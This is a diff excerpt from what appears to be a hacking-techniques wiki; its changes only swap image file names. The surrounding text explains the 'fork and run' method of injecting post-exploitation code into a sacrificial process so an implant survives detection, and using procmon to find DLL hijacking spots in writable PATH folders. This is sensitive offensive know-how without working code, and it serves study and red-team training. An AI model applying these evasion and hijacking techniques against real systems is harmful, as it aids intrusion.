@ -303,7 +303,7 @@ Most C2 frameworks (sliver, Covenant, metasploit, CobaltStrike, Havoc, etc.) alr
|
||||||
|
|
||||||
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
|
It involves **spawning a new sacrificial process**, inject your post-exploitation malicious code into that new process, execute your malicious code and when finished, kill the new process. This has both its benefits and its drawbacks. The benefit to the fork and run method is that execution occurs **outside** our Beacon implant process. This means that if something in our post-exploitation action goes wrong or gets caught, there is a **much greater chance** of our **implant surviving.** The drawback is that you have a **greater chance** of getting caught by **Behavioural Detections**.
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (7) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (7) (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* **Inline**
|
* **Inline**
|
||||||
|
|
||||||
|
|
|
@ -57,7 +57,7 @@ if ($envPath -notlike "*$folderPath*") {
|
||||||
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
|
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
|
||||||
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
|
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (18) (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Missed Dlls
|
### Missed Dlls
|
||||||
|
|
||||||
|
|